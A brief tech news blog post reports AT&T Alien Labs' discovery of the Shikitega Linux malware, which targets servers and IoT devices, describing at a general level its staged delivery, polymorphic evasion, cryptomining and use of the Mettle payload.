New Linux Malware Discovered, Targets Internet-of-Things Devices and Servers • iPhone in Canada Blog


Researchers at the AT&T Alien Labs have discovered a new breed of Linux malware that is extremely difficult to detect and affects both traditional servers and Internet-of-things devices, which are typically less secure than your average computer (via Ars Technica).

The malware, dubbed “Shikitega”, is delivered via a multi-stage infection chain and uses polymorphic coding to slip under the radar of antivirus technologies and other defenses. Additionally, Shikitega hosts its command-and-control servers on recognizable cloud services to appear legit.

“Threat actors continue to look for ways to deliver malware in new ways to stay under the radar and avoid detection,” wrote AT&T Alien Labs researcher Ofer Caspi.

“Shikitega malware is delivered in an advanced manner, it uses a polymorphic encoder and it gradually delivers its payload, with each step revealing only a portion of the total payload. In addition, the malware misuses well-known hosting services to host its command and control servers.”

What exactly Shikitega does once it has infected a system is not clear. It drops the XMRig software miner for the Monero cryptocurrency on the victim device, so sneaky cryptojacking is a possibility.

However, Shikitega also downloads and runs a powerful Metasploit package known as Mettle, which is capable of much more.

Mettle can override webcam control, steal credentials, and combine multiple inverted shells into a package that runs on everything from “the tiniest embedded Linux targets to the big iron.” Shikitega injecting Mettle into infected systems indicates there is more going on than just clandestine Monero mining.


Leave a Comment